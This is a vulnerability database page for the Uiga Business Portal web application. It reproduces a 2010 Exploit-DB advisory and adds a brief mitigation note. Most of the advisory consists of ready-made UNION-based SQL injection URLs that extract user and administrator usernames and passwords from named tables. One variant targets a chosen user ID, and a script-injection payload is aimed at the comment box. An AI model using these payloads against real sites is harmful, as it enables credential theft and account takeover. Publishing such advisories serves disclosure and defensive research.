Uiga Business Portal SQL/ XSS Vulnerability

vendor:

Uiga Business Portal

by:

Sioma Labs

7,5

CVSS

HIGH

SQL Injection/XSS

89, 79

CWE

Product Name: Uiga Business Portal

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux (Cent OS 5.4, Apache/2.2.3, MYSQL v5.0.77) and Windows (Windows XPsp2, Wamp)

2010

Uiga Business Portal SQL/ XSS Vulnerability

Uiga Business Portal is vulnerable to SQL Injection and XSS. An attacker can inject malicious SQL queries into the application to gain access to the database. An attacker can also inject malicious HTML and JavaScript code into the application using the comment box.

Mitigation:

Input validation should be used to prevent SQL Injection and XSS attacks. The application should also be tested for vulnerabilities regularly.

Source

Exploit-DB raw data:

# Exploit Title: Uiga Business Portal SQL/ XSS Vulnerability
# Date: 8/2/2010
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net 
# Software Link: http://www.scriptdevelopers.net/download/uigapersonalportal.zip
# Version: N/A
# Tested on: 
	
	Linux 
	
	OS = Cent OS 5.4
	Server = Apache/2.2.3
	SQLDB = MYSQL v5.0.77 
	
	Windows
	
	OS = Windows XPsp2
	App = Wamp
		

# CVE : N/A
# Code : N/A


----------------------------------------------------
 __ _                           __       _         
/ _(_) ___  _ __ ___   __ _    / /  __ _| |__  ___ 
\ \| |/ _ \| '_ ` _ \ / _` |  / /  / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
                                                   
----------------------------------------------------



SQL Injection Vulnerability

UserAge : [host]/blog/index.php?view=noentryid&noentryid=[SQLi]



- User SQLi ->
--------------

Ex : http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=-20+Union+All+Select+1,2,3,4,5,group_concat(user_id,0x3a,username,0x3a,password),7,8,9,10+from+tbl_user--


- Admin SQLi ->
---------------

Ex : http://server/ulgabusinessportak/index2.php?c=29&p=-45+Union+All+Select 1,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),3,4,5+from+admin--


- Or Choice By User ID ->
--------------------------

http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=-20+Union+All+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10+from+tbl_user+where+user_id=1--

*/ Change the last User ID 

#######################################################################################################



XSS Vulnerability
--------

- You can inject html with the comment box

Test Link
http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=20


Inject "<script>alert("XSS")</script>" into the portal using Comment Box



# Sioma Agent -154
# http://siomalabs.com